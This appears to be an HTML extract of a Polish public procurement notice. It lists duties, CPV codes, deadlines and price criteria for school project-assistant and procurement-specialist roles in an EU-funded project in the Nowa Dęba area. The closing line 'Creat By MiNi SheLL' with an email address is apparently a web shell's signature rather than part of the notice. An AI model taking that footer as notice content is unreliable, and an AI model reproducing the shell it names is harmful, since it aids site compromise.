18)	Bezpośredni kontakt z uczniami szkoły w sprawach dotyczących projektu. Informowanie uczniów i rodziców we wszelkich sprawach dotyczących projektu. Współpraca z rodzicami w zakresie informowania o udziale i postępach uczniów w ramach działań projektowych.
19)	Przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
20)	tworzenie harmonogramów zajęć dodatkowych / kursów / wycieczek / praktyk zawodowych / staży  w uzgodnieniu ze specjalista ds. finansowych, planowanie sal oraz zabezpieczenie dostępu do sal w czasie trwania działań,
21)	organizacja praktyk zawodowych i staży w ramach projektu. W przypadku organizacji obozów - wypełnienie obowiązków wynikających ze szkolnych przepisów regulujących organizację i uczestnictwo w obozach,
22)	przygotowywanie i weryfikacja dokumentacji zajęć ( w tym m.in. dzienników zajęć).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu nr2 w Zespole Szkół Nr 1 w Nowej Dębie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków szkolnego asystenta koordynatora projektu nr2 w Zespole Szkół Nr 1 w Nowej Dębie obejmuje:
1)	opracowanie instrukcji archiwizacja dokumentów projektowych i archiwizowanie ich zgodnie z instrukcją,
2)	częściowe opisywanie faktur dotyczących zakupów z budżetu projektu w tym merytorycznym.
3)	współpraca przy opracowaniu części sprawozdawczej wniosków o płatność,
4)	ewaluacji projektu (raporty), 
5)	wydruk ankiet początkowych i końcowych oraz innych wymaganych dla prawidłowej realizacji projektu oraz przekazanie ich nauczycielowi/trenerowi prowadzącemu zajęcia, celem przeprowadzenia badania,
6)	weryfikacja wyników ankiet i ich rejestracja w bazie EXCEL prowadzonej dla danej szkoły,
7)	przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
8)	pozyskanie danych osobowych uczestników projektu w zakresie przewidzianym w formularzu PEFS, oświadczeń o wyrażeniu zgody na przetwarzanie danych oraz deklaracji uczestnictwa w projekcie,
9)	prowadzenie kontroli realizacji działań projektowych w obrębie danej szkoły,
10)	informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań
11)	wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu,
12)	przygotowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu. Dostosowanie wzorów dokumentów do potrzeb danej szkoły,
13)	zgłaszanie do koordynatora projektu oraz uzgadnianie z koordynatorem projektu  wszelkich zmian w realizacji i budżecie projektu, współpraca ze specjalista ds. finansowych i specjalistą ds. zamówień publicznych projektu,
14)	tworzenie opisów przedmiotów zamówienia w zakresie zakupów dla danej szkoły. Udział w pracach komisji przetargowej,
15)	nadzorowanie odbioru zakupionego sprzętu,
16)	współpraca z członkami zespołu projektowego,
17)	podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu nr1 w Zespole Szkół Nr 2 im.E.Kwiatkowskiego w Nowej Dębie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków szkolnego asystenta koordynatora projektu nr1 w Zespole Szkół Nr 2 im.E.Kwiatkowskiego w Nowej Dębie, obejmuje:
1)  nadzór nad prawidłową realizacją merytorycznych działań projektu w danej szkole, zgodnie z wymogami POKL,      obowiązującymi przepisami krajowymi oraz w oparciu o Umowę o dofinansowanie wraz z załącznikami,
2)	planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu w danej szkole,
3)	wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu
4)	współpraca z członkami zespołu projektowego,
5)	podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,
6)	pozyskiwanie i współpraca z zakładami pracy w ramach organizacji staży i praktyk, przekazywanie do biura projektu wszelkich informacji dot. pracodawców, w celu przygotowania umów o organizację stażu lub praktyki zawodowej,
7)	przygotowanie i realizacja rekrutacji uczestników projektu (opracowanie regulaminu rekrutacji, nadzór nad przygotowaniem ankiet rekrutacyjnych, założenie teczek uczestnikom projektu). Udział w pracach Komisji Rekrutacyjnej, tworzenie protokołów z prac Komisji rekrutacyjnej, informowanie uczestników o zakwalifikowaniu się do projektu,
8)	współpraca w zakresie przygotowania rekrutacji z pedagogiem szkolnym i ustalenie zawartości teczki uczestnika projektu,
9)	monitoring rzeczowy - zgodność realizacji projektu z planem merytorycznym (monitoring dokumentacji szkoleniowej: programy i harmonogramy praktyk, staży, szkoleń, sprawdzanie dokumentacji, list obecności, potwierdzenie odbioru podręczników i materiałów szkoleniowych oraz wsparcia towarzyszącego, sprawozdania cząstkowe dotyczące prowadzonych zadań w ramach projektu),
10)	zagwarantowanie właściwych warunków pracy na poszczególnych zajęciach (odpowiedni sprzęt, wyposażenie) zapewniając prawidłowy ich przebieg. Współpraca z nauczycielami biorącymi udział w realizacji projektu w danej szkole oraz przekazywanie informacji do biura projektu o zapotrzebowaniu na materiały biurowe, itp.
11)	sprawdzanie kart pracy nauczycielom prowadzącym zajęcia i ich zatwierdzanie,
12)	informowanie potencjalnych uczestników oraz społeczeństwa o fakcie współfinansowania przedsięwzięcia ze środków Unii Europejskiej w ramach EFS,
13)	informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań,
14)	prowadzenie kontroli realizacji działań projektowych w obrębie danej szkoły,
15)	współpraca z instytucjami przeprowadzającymi egzaminy zewnętrzne w ramach projektu,
16)	wizualizacja materiałów szkoleniowych i podręczników poprzez umieszczenie naklejki informacyjnej oraz kompletowanie zestawów szkoleniowych dla uczniów i przekazywanie ich nauczycielom/trenerom. Uzyskanie potwierdzenia odbioru materiałów szkoleniowych.
17)	Współudział w organizacji spotkań informacyjnych dla uczniów i rodziców  w obrębie obsługiwanej szkoły.
18)	Bezpośredni kontakt z uczniami szkoły w sprawach dotyczących projektu. Informowanie uczniów i rodziców we wszelkich sprawach dotyczących projektu. Współpraca z rodzicami w zakresie informowania o udziale i postępach uczniów w ramach działań projektowych.
19)	Przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
20)	tworzenie harmonogramów zajęć dodatkowych / kursów / wycieczek / praktyk zawodowych / staży  w uzgodnieniu ze specjalista ds. finansowych, planowanie sal oraz zabezpieczenie dostępu do sal w czasie trwania działań,
21)	organizacja praktyk zawodowych i staży w ramach projektu. W przypadku organizacji obozów - wypełnienie obowiązków wynikających ze szkolnych przepisów regulujących organizację i uczestnictwo w obozach,
22)	przygotowywanie i weryfikacja dokumentacji zajęć ( w tym m.in. dzienników zajęć).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu nr2 w Zespole Szkół Nr 2 im.E.Kwiatkowskiego w Nowej Dębie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków szkolnego asystenta koordynatora projektu nr2 w Zespole Szkół Nr 2 im.E.Kwiatkowskiego 
w Nowej Dębie, obejmuje:
1)	opracowanie instrukcji archiwizacja dokumentów projektowych i archiwizowanie ich zgodnie z instrukcją,
2)	częściowe opisywanie faktur dotyczących zakupów z budżetu projektu w tym merytorycznym.
3)	współpraca przy opracowaniu części sprawozdawczej wniosków o płatność,
4)	ewaluacji projektu (raporty), 
5)	wydruk ankiet początkowych i końcowych oraz innych wymaganych dla prawidłowej realizacji projektu oraz przekazanie ich nauczycielowi/trenerowi prowadzącemu zajęcia, celem przeprowadzenia badania,
6)	weryfikacja wyników ankiet i ich rejestracja w bazie EXCEL prowadzonej dla danej szkoły,
7)	przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
8)	pozyskanie danych osobowych uczestników projektu w zakresie przewidzianym w formularzu PEFS, oświadczeń o wyrażeniu zgody na przetwarzanie danych oraz deklaracji uczestnictwa w projekcie,
9)	prowadzenie kontroli realizacji działań projektowych w obrębie danej szkoły,
10)	informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań
11)	wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu,
12)	przygotowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu. Dostosowanie wzorów dokumentów do potrzeb danej szkoły,
13)	zgłaszanie do koordynatora projektu oraz uzgadnianie z koordynatorem projektu  wszelkich zmian w realizacji i budżecie projektu, współpraca ze specjalista ds. finansowych i specjalistą ds. zamówień publicznych projektu,
14)	tworzenie opisów przedmiotów zamówienia w zakresie zakupów dla danej szkoły. Udział w pracach komisji przetargowej,
15)	nadzorowanie odbioru zakupionego sprzętu,
16)	współpraca z członkami zespołu projektowego,
17)	podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu w Zespole Szkół im.por.J.Sarny w Gorzycach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków szkolnego asystenta koordynatora projektu w Zespole Szkół im.por.J.Sarny w Gorzycach obejmuje:
1)  nadzór nad prawidłową realizacją merytorycznych działań projektu w danej szkole, zgodnie z wymogami POKL, obowiązującymi przepisami krajowymi oraz w oparciu o Umowę o dofinansowanie wraz z załącznikami,
2)	planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu w danej szkole,
3)	wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu
4)	podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,
5)	pozyskiwanie i współpraca z zakładami pracy w ramach organizacji staży i praktyk, przekazywanie do biura projektu wszelkich informacji dot. pracodawców, w celu przygotowania umów o organizację stażu lub praktyki zawodowej,
6)	przygotowanie i realizacja rekrutacji uczestników projektu (opracowanie regulaminu rekrutacji, nadzór nad przygotowaniem ankiet rekrutacyjnych, założenie teczek uczestnikom projektu). Udział w pracach Komisji Rekrutacyjnej, tworzenie protokołów z prac Komisji rekrutacyjnej, informowanie uczestników o zakwalifikowaniu się do projektu,
7)	współpraca w zakresie przygotowania rekrutacji z pedagogiem szkolnym i ustalenie zawartości teczki uczestnika projektu,
8)	monitoring rzeczowy - zgodność realizacji projektu z planem merytorycznym (monitoring dokumentacji szkoleniowej: programy i harmonogramy praktyk, staży, szkoleń, sprawdzanie dokumentacji, list obecności, potwierdzenie odbioru podręczników i materiałów szkoleniowych oraz wsparcia towarzyszącego, sprawozdania cząstkowe dotyczące prowadzonych zadań w ramach projektu),
9)	zagwarantowanie właściwych warunków pracy na poszczególnych zajęciach (odpowiedni sprzęt, wyposażenie) zapewniając prawidłowy ich przebieg. Współpraca z nauczycielami biorącymi udział w realizacji projektu w danej szkole oraz przekazywanie informacji do biura projektu o zapotrzebowaniu na materiały biurowe, itp.
10)	sprawdzanie kart pracy nauczycielom prowadzącym zajęcia i ich zatwierdzanie,
11)	informowanie potencjalnych uczestników oraz społeczeństwa o fakcie współfinansowania przedsięwzięcia ze środków Unii Europejskiej w ramach EFS,
12)	informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań,
13)	prowadzenie kontroli realizacji działań projektowych w obrębie danej szkoły,
14)	współpraca z instytucjami przeprowadzającymi egzaminy zewnętrzne w ramach projektu,
15)	wizualizacja materiałów szkoleniowych i podręczników poprzez umieszczenie naklejki informacyjnej oraz kompletowanie zestawów szkoleniowych dla uczniów i przekazywanie ich nauczycielom/trenerom. Uzyskanie potwierdzenia odbioru materiałów szkoleniowych.
16)	Współudział w organizacji spotkań informacyjnych dla uczniów i rodziców  w obrębie obsługiwanej szkoły.
17)	Bezpośredni kontakt z uczniami szkoły w sprawach dotyczących projektu. Informowanie uczniów i rodziców we wszelkich sprawach dotyczących projektu. Współpraca z rodzicami w zakresie informowania o udziale i postępach uczniów w ramach działań projektowych.
18)	tworzenie harmonogramów zajęć dodatkowych / kursów / wycieczek / praktyk zawodowych / staży  w uzgodnieniu ze specjalista ds. finansowych, planowanie sal oraz zabezpieczenie dostępu do sal w czasie trwania działań,
19)	organizacja praktyk zawodowych i staży w ramach projektu. W przypadku organizacji obozów - wypełnienie obowiązków wynikających ze szkolnych przepisów regulujących organizację i uczestnictwo w obozach,
20)	przygotowywanie i weryfikacja dokumentacji zajęć ( w tym m.in. dzienników zajęć)
18)	opracowanie instrukcji archiwizacja dokumentów projektowych i archiwizowanie ich zgodnie z instrukcją,
19)	częściowe opisywanie faktur dotyczących zakupów z budżetu projektu w tym merytorycznym.
20)	współpraca przy opracowaniu części sprawozdawczej wniosków o płatność,
21)	ewaluacji projektu (raporty), 
22)	wydruk ankiet początkowych i końcowych oraz innych wymaganych dla prawidłowej realizacji projektu oraz przekazanie ich nauczycielowi/trenerowi prowadzącemu zajęcia, celem przeprowadzenia badania,
23)	weryfikacja wyników ankiet i ich rejestracja w bazie EXCEL prowadzonej dla danej szkoły,
24)	przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
25)	pozyskanie danych osobowych uczestników projektu w zakresie przewidzianym w formularzu PEFS, oświadczeń o wyrażeniu zgody na przetwarzanie danych oraz deklaracji uczestnictwa w projekcie,
26)	prowadzenie kontroli realizacji działań projektowych w obrębie danej szkoły,
27)	informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań
28)	wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu,
29)	przygotowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu. Dostosowanie wzorów dokumentów do potrzeb danej szkoły,
30)	zgłaszanie do koordynatora projektu oraz uzgadnianie z koordynatorem projektu  wszelkich zmian w realizacji i budżecie projektu, współpraca ze specjalista ds. finansowych i specjalistą ds. zamówień publicznych projektu,
31)	tworzenie opisów przedmiotów zamówienia w zakresie zakupów dla danej szkoły. Udział w pracach komisji przetargowej,
32)	nadzorowanie odbioru zakupionego sprzętu,
33)	współpraca z członkami zespołu projektowego,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu w Specjalnego Ośrodka Szkolno - Wychowawczego w Grębowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków szkolnego asystenta koordynatora projektu w Specjalnego Ośrodka Szkolno - Wychowawczego w Grębowie obejmuje:
1)  nadzór nad prawidłową realizacją merytorycznych działań projektu w danej szkole, zgodnie z wymogami POKL, obowiązującymi przepisami krajowymi oraz w oparciu o Umowę o dofinansowanie wraz z załącznikami,
2)	planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu w danej szkole,
3)	wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu
4)	podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,
5)	pozyskiwanie i współpraca z zakładami pracy w ramach organizacji staży i praktyk, przekazywanie do biura projektu wszelkich informacji dot. pracodawców, w celu przygotowania umów o organizację stażu lub praktyki zawodowej,
6)	przygotowanie i realizacja rekrutacji uczestników projektu (opracowanie regulaminu rekrutacji, nadzór nad przygotowaniem ankiet rekrutacyjnych, założenie teczek uczestnikom projektu). Udział w pracach Komisji Rekrutacyjnej, tworzenie protokołów z prac Komisji rekrutacyjnej, informowanie uczestników o zakwalifikowaniu się do projektu,
7)	współpraca w zakresie przygotowania rekrutacji z pedagogiem szkolnym i ustalenie zawartości teczki uczestnika projektu,
8)	monitoring rzeczowy - zgodność realizacji projektu z planem merytorycznym (monitoring dokumentacji szkoleniowej: programy i harmonogramy praktyk, staży, szkoleń, sprawdzanie dokumentacji, list obecności, potwierdzenie odbioru podręczników i materiałów szkoleniowych oraz wsparcia towarzyszącego, sprawozdania cząstkowe dotyczące prowadzonych zadań w ramach projektu),
9)	zagwarantowanie właściwych warunków pracy na poszczególnych zajęciach (odpowiedni sprzęt, wyposażenie) zapewniając prawidłowy ich przebieg. Współpraca z nauczycielami biorącymi udział w realizacji projektu w danej szkole oraz przekazywanie informacji do biura projektu o zapotrzebowaniu na materiały biurowe, itp.
10)	sprawdzanie kart pracy nauczycielom prowadzącym zajęcia i ich zatwierdzanie,
11)	informowanie potencjalnych uczestników oraz społeczeństwa o fakcie współfinansowania przedsięwzięcia ze środków Unii Europejskiej w ramach EFS,
12)	informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań,
13)	prowadzenie kontroli realizacji działań projektowych w obrębie danej szkoły,
14)	współpraca z instytucjami przeprowadzającymi egzaminy zewnętrzne w ramach projektu,
15)	wizualizacja materiałów szkoleniowych i podręczników poprzez umieszczenie naklejki informacyjnej oraz kompletowanie zestawów szkoleniowych dla uczniów i przekazywanie ich nauczycielom/trenerom. Uzyskanie potwierdzenia odbioru materiałów szkoleniowych.
16)	Współudział w organizacji spotkań informacyjnych dla uczniów i rodziców  w obrębie obsługiwanej szkoły.
17)	Bezpośredni kontakt z uczniami szkoły w sprawach dotyczących projektu. Informowanie uczniów i rodziców we wszelkich sprawach dotyczących projektu. Współpraca z rodzicami w zakresie informowania o udziale i postępach uczniów w ramach działań projektowych.
18)	tworzenie harmonogramów zajęć dodatkowych / kursów / wycieczek / praktyk zawodowych / staży  w uzgodnieniu ze specjalista ds. finansowych, planowanie sal oraz zabezpieczenie dostępu do sal w czasie trwania działań,
19)	organizacja praktyk zawodowych i staży w ramach projektu. W przypadku organizacji obozów - wypełnienie obowiązków wynikających ze szkolnych przepisów regulujących organizację i uczestnictwo w obozach,
20)	przygotowywanie i weryfikacja dokumentacji zajęć ( w tym m.in. dzienników zajęć)
21)	opracowanie instrukcji archiwizacja dokumentów projektowych i archiwizowanie ich zgodnie z instrukcją,
22)	częściowe opisywanie faktur dotyczących zakupów z budżetu projektu w tym merytorycznym.
23)	współpraca przy opracowaniu części sprawozdawczej wniosków o płatność,
24)	ewaluacji projektu (raporty), 
25)	wydruk ankiet początkowych i końcowych oraz innych wymaganych dla prawidłowej realizacji projektu oraz przekazanie ich nauczycielowi/trenerowi prowadzącemu zajęcia, celem przeprowadzenia badania,
26)	weryfikacja wyników ankiet i ich rejestracja w bazie EXCEL prowadzonej dla danej szkoły,
27)	przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
28)	pozyskanie danych osobowych uczestników projektu w zakresie przewidzianym w formularzu PEFS, oświadczeń o wyrażeniu zgody na przetwarzanie danych oraz deklaracji uczestnictwa w projekcie,
29)	prowadzenie kontroli realizacji działań projektowych w obrębie danej szkoły,
30)	informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań
31)	wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu,
32)	przygotowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu. Dostosowanie wzorów dokumentów do potrzeb danej szkoły,
33)	zgłaszanie do koordynatora projektu oraz uzgadnianie z koordynatorem projektu  wszelkich zmian w realizacji i budżecie projektu, współpraca ze specjalista ds. finansowych i specjalistą ds. zamówień publicznych projektu,
34)	tworzenie opisów przedmiotów zamówienia w zakresie zakupów dla danej szkoły. Udział w pracach komisji przetargowej,
35)	nadzorowanie odbioru zakupionego sprzętu,
36)	współpraca z członkami zespołu projektowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 - Pełnienie funkcji specjalisty ds. zamówień publicznych projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków specjalisty ds. zamówień publicznych projektu:
1)	przygotowywanie i prowadzenie wymaganej dokumentacji o udzielenie zamówienia publicznego dot. realizacji zadań projektu, zgodnie z ustawą Prawo zamówień publicznych,
2)	zapewnienie zasad konkurencyjności i przejrzystości wynikających z prawa  wspólnotowego,
3)	przygotowywanie Specyfikacji Istotnych Warunków  Zamówienia,
4)	szczegółowa analiza i ocena ofert,
5)	zapewnienie poufności procesu udzielenia zamówienia publicznego,
6)	zarządzanie zakupami dostaw i usług,
7)	przygotowywanie wzorów stosownych umów,
8)	pozostałych zadań wynikających z realizacji projektu a dotyczących tematyki zamówień publicznych,
9)	współpraca z koordynatorem projektu oraz członkami zespołu projektowego.
10)	Sporządzenie sprawozdania z przeprowadzonych postępowań w ramach projektu.
11)	Konsultacje min. 3 godz/m-c w siedzibie Zamawiającego, w każdym miesiącu do końca trwania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com